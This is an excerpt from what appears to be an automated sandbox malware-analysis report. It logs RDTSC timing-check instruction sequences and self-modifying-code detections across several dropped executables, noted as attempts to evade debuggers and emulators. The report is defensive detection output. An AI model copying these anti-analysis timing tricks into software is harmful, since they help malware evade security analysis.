Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 55FC3B second address: 55FC41 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 55FC41 second address: 55FC4D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FC3A8C83B36h 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 55FC4D second address: 55FC51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 55FC51 second address: 55FC5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FC3A8C83B3Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 55FDE3 second address: 55FDE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 55FDE9 second address: 55FDEE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 55FFB7 second address: 55FFD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3A8C81778h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 56271B second address: 562722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 562DA5 second address: 562DC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C8176Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC3A8C8176Bh 0x00000010 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 5637C8 second address: 5637CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 563914 second address: 563958 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push esi 0x0000000d call 00007FC3A8C81768h 0x00000012 pop esi 0x00000013 mov dword ptr [esp+04h], esi 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc esi 0x00000020 push esi 0x00000021 ret 0x00000022 pop esi 0x00000023 ret 0x00000024 mov esi, dword ptr [ebp+12473DBBh] 0x0000002a push eax 0x0000002b pushad 0x0000002c jmp 00007FC3A8C8176Ch 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 5647D4 second address: 564867 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FC3A8C83B38h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 push 00000000h 0x00000026 push 00000000h 0x00000028 push esi 0x00000029 call 00007FC3A8C83B38h 0x0000002e pop esi 0x0000002f mov dword ptr [esp+04h], esi 0x00000033 add dword ptr [esp+04h], 00000016h 0x0000003b inc esi 0x0000003c push esi 0x0000003d ret 0x0000003e pop esi 0x0000003f ret 0x00000040 mov dword ptr [ebp+122D3324h], edi 0x00000046 sub di, B33Fh 0x0000004b push 00000000h 0x0000004d call 00007FC3A8C83B46h 0x00000052 movzx edi, di 0x00000055 pop edi 0x00000056 xchg eax, ebx 0x00000057 jmp 00007FC3A8C83B41h 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f push esi 0x00000060 jg 00007FC3A8C83B36h 0x00000066 pop esi 0x00000067 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 564867 second address: 564871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007FC3A8C81766h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 564871 second address: 564875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 566DBA second address: 566DBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 566DBE second address: 566DC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 566DC4 second address: 566DC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 5678EB second address: 5678F0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 568F1D second address: 568F26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 56A9DF second address: 56A9EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007FC3A8C83B38h 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 56E2BB second address: 56E2E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C81770h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jc 00007FC3A8C8176Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 jl 00007FC3A8C81766h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 56E2E8 second address: 56E2EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 56E2EC second address: 56E2F2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 56F8A5 second address: 56F8AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC3A8C83B36h 0x0000000a rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 5708E6 second address: 5708EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 5718A7 second address: 5718AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 574736 second address: 5747D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FC3A8C81766h 0x0000000a popad 0x0000000b push edx 0x0000000c jmp 00007FC3A8C81771h 0x00000011 pop edx 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 push 00000000h 0x00000018 push eax 0x00000019 call 00007FC3A8C81768h 0x0000001e pop eax 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 add dword ptr [esp+04h], 00000016h 0x0000002b inc eax 0x0000002c push eax 0x0000002d ret 0x0000002e pop eax 0x0000002f ret 0x00000030 mov bl, 8Dh 0x00000032 push 00000000h 0x00000034 jmp 00007FC3A8C81773h 0x00000039 push 00000000h 0x0000003b push 00000000h 0x0000003d push eax 0x0000003e call 00007FC3A8C81768h 0x00000043 pop eax 0x00000044 mov dword ptr [esp+04h], eax 0x00000048 add dword ptr [esp+04h], 0000001Ah 0x00000050 inc eax 0x00000051 push eax 0x00000052 ret 0x00000053 pop eax 0x00000054 ret 0x00000055 xchg eax, esi 0x00000056 jnl 00007FC3A8C8176Ah 0x0000005c push eax 0x0000005d pushad 0x0000005e pushad 0x0000005f push edx 0x00000060 pop edx 0x00000061 jmp 00007FC3A8C81771h 0x00000066 popad 0x00000067 push eax 0x00000068 push edx 0x00000069 push ecx 0x0000006a pop ecx 0x0000006b rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 5747D7 second address: 5747DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 568178 second address: 568182 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC3A8C81766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 578AC4 second address: 578B1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 nop 0x00000007 movzx edi, di 0x0000000a push 00000000h 0x0000000c mov dword ptr [ebp+122D2735h], esi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007FC3A8C83B38h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e sub dword ptr [ebp+122D1CF5h], eax 0x00000034 xchg eax, esi 0x00000035 jg 00007FC3A8C83B3Eh 0x0000003b push eax 0x0000003c pushad 0x0000003d jmp 00007FC3A8C83B3Ch 0x00000042 push ecx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 57FA46 second address: 57FA61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C81773h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 57FA61 second address: 57FA65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 57FA65 second address: 57FAB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3A8C81772h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007FC3A8C81778h 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pop edx 0x00000015 popad 0x00000016 jnp 00007FC3A8C817A7h 0x0000001c push eax 0x0000001d push edx 0x0000001e push edi 0x0000001f pop edi 0x00000020 jmp 00007FC3A8C81772h 0x00000025 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 51BA13 second address: 51BA26 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC3A8C83B36h 0x00000008 ja 00007FC3A8C83B36h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 51BA26 second address: 51BA40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC3A8C81772h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 56EA01 second address: 56EA92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov dword ptr [esp], eax 0x00000008 push dword ptr fs:[00000000h] 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FC3A8C83B38h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000019h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 mov edi, eax 0x0000002b add bx, 6BEDh 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 sbb edi, 7C62DC30h 0x0000003d mov eax, dword ptr [ebp+122D0D0Dh] 0x00000043 push FFFFFFFFh 0x00000045 push 00000000h 0x00000047 push edi 0x00000048 call 00007FC3A8C83B38h 0x0000004d pop edi 0x0000004e mov dword ptr [esp+04h], edi 0x00000052 add dword ptr [esp+04h], 00000014h 0x0000005a inc edi 0x0000005b push edi 0x0000005c ret 0x0000005d pop edi 0x0000005e ret 0x0000005f movzx edi, bx 0x00000062 nop 0x00000063 jl 00007FC3A8C83B42h 0x00000069 jnc 00007FC3A8C83B3Ch 0x0000006f push eax 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007FC3A8C83B3Fh 0x00000078 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 56EA92 second address: 56EAB6 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC3A8C81766h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC3A8C81778h 0x00000011 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 570A2B second address: 570A50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC3A8C83B49h 0x00000011 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 570A50 second address: 570A59 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 570A59 second address: 570AF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FC3A8C83B36h 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FC3A8C83B38h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 00000015h 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 mov ebx, edi 0x00000029 push dword ptr fs:[00000000h] 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007FC3A8C83B38h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000018h 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a mov ebx, dword ptr [ebp+122D2DD9h] 0x00000050 mov dword ptr fs:[00000000h], esp 0x00000057 mov ebx, dword ptr [ebp+122D2E21h] 0x0000005d mov eax, dword ptr [ebp+122D1459h] 0x00000063 jmp 00007FC3A8C83B3Bh 0x00000068 push FFFFFFFFh 0x0000006a push ebx 0x0000006b movsx ebx, bx 0x0000006e pop edi 0x0000006f nop 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007FC3A8C83B47h 0x00000077 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 571B29 second address: 571B2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 571B2E second address: 571B34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 5729A2 second address: 5729A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 5729A6 second address: 5729AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 574986 second address: 57498C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 57498C second address: 574990 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 5811DE second address: 5811E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 577C7E second address: 577CA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C83B46h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 577CA0 second address: 577D14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC3A8C81770h 0x0000000a popad 0x0000000b nop 0x0000000c mov ebx, dword ptr [ebp+122D1EAAh] 0x00000012 push dword ptr fs:[00000000h] 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 push 00000000h 0x00000022 push ecx 0x00000023 call 00007FC3A8C81768h 0x00000028 pop ecx 0x00000029 mov dword ptr [esp+04h], ecx 0x0000002d add dword ptr [esp+04h], 0000001Ch 0x00000035 inc ecx 0x00000036 push ecx 0x00000037 ret 0x00000038 pop ecx 0x00000039 ret 0x0000003a mov eax, dword ptr [ebp+122D0685h] 0x00000040 jmp 00007FC3A8C81774h 0x00000045 push FFFFFFFFh 0x00000047 mov di, si 0x0000004a nop 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 577D14 second address: 577D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 578CC9 second address: 578CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 579BF2 second address: 579BF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 57ABC6 second address: 57AC42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FC3A8C81768h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D3999h] 0x0000002a push dword ptr fs:[00000000h] 0x00000031 cmc 0x00000032 mov dword ptr fs:[00000000h], esp 0x00000039 mov bl, 61h 0x0000003b mov eax, dword ptr [ebp+122D067Dh] 0x00000041 push 00000000h 0x00000043 push eax 0x00000044 call 00007FC3A8C81768h 0x00000049 pop eax 0x0000004a mov dword ptr [esp+04h], eax 0x0000004e add dword ptr [esp+04h], 0000001Bh 0x00000056 inc eax 0x00000057 push eax 0x00000058 ret 0x00000059 pop eax 0x0000005a ret 0x0000005b or bx, 08BEh 0x00000060 movzx edi, ax 0x00000063 push FFFFFFFFh 0x00000065 nop 0x00000066 push eax 0x00000067 push edx 0x00000068 push edi 0x00000069 pushad 0x0000006a popad 0x0000006b pop edi 0x0000006c rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 57AC42 second address: 57AC4C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FC3A8C83B3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 57CC8B second address: 57CD0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC3A8C81774h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov bh, cl 0x0000000c push dword ptr fs:[00000000h] 0x00000013 mov di, bx 0x00000016 mov dword ptr fs:[00000000h], esp 0x0000001d jbe 00007FC3A8C8176Ch 0x00000023 sub dword ptr [ebp+122D33A2h], edx 0x00000029 mov eax, dword ptr [ebp+122D13A1h] 0x0000002f push 00000000h 0x00000031 push ebx 0x00000032 call 00007FC3A8C81768h 0x00000037 pop ebx 0x00000038 mov dword ptr [esp+04h], ebx 0x0000003c add dword ptr [esp+04h], 0000001Bh 0x00000044 inc ebx 0x00000045 push ebx 0x00000046 ret 0x00000047 pop ebx 0x00000048 ret 0x00000049 push FFFFFFFFh 0x0000004b mov edi, dword ptr [ebp+122D2F3Dh] 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 jmp 00007FC3A8C81770h 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 57CD0A second address: 57CD0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 583A29 second address: 583A33 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 583A33 second address: 583A39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 585F8D second address: 585F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 585F93 second address: 585F99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 585F99 second address: 585F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 58975C second address: 58976C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC3A8C83B3Ch 0x00000009 rdtsc
Source: C:\Users\user\DocumentsIIEBKJECFC.exe RDTSC instruction interceptor: First address: 58976C second address: 589786 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC3A8C8176Fh 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 99FAFE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: B76AAB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: B567E7 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Special instruction interceptor: First address: 55A571 instructions caused by: Self-modifying code
Source: C:\Users\user\DocumentsIIEBKJECFC.exe Special instruction interceptor: First address: 558C4A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 102A571 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 1028C4A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Special instruction interceptor: First address: 709D5C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Special instruction interceptor: First address: 709E20 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Special instruction interceptor: First address: 8C9BCC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Special instruction interceptor: First address: 8A94B6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005812001\c3e1e78f6d.exe Special instruction interceptor: First address: 934D8C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Special instruction interceptor: First address: 11BFAFE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Special instruction interceptor: First address: 1396AAB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005813001\82b4c5cad2.exe Special instruction interceptor: First address: 13767E7 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Special instruction interceptor: First address: 98DD63 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Special instruction interceptor: First address: 98DE39 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Special instruction interceptor: First address: B362DE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Special instruction interceptor: First address: 98B6CE instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1005815001\accd68d705.exe Special instruction interceptor: First address: BCC4E6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Special instruction interceptor: First address: 2ADD63 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Special instruction interceptor: First address: 2ADE39 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\70XXT0BM2TDFAKTXCB0ILV78JWN4.exe Special instruction interceptor: First address: 4562DE instructions caused by: Self-modifying code
